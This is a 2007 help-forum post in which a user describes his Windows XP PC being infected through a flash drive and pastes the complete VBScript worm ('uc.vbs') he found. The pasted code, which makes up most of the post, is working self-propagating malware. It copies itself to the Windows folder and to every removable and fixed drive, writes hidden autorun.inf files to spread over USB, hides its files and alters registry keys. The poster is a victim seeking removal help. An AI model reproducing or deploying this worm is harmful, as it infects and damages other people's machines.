Hacked by UC??? - SF

21-Mar-07 04:01:20
 
Hi,

I recently visited an internet shop, I downloaded some files, plug my flash
drive in to copy those download files. At home, I plug the flash drive into
my PC and transfering the files. When I start my windows xp the next day, I
cannot double click on the C: drive, it did not work (did not open). I got a
brief display of the hour glass. When I open a web page, I saw on the top a
message displaying the "Hacked by UC".

I found a script below that cause the above problem. Does this a sign of
hacking and how do I set it back to my previous windows setting?


'My name is Slow but sure V0.05
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe uc.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\uc.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\uc.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\uc.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and
flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\uc.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\uc.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\uc.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\Window Title","Hacked by UC"
rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
reply
Hacked by UC??? - SF 21-Mar-07
        Re: Hacked by UC??? - Paulaner 21-Mar-07
                Its not that easy.... - scott 30-Mar-07
                        done - Done 31-Mar-07
        re: Hacked by UC??? - Ai Chung Chong 31-Mar-07
                trouble removing "hacked by uc" - julia 02-Apr-07
                        Hacked by UC’ Problem - Paul Hatch 15-Oct-07

VBscript embed images in HTML email body
  

Search

search

Purchase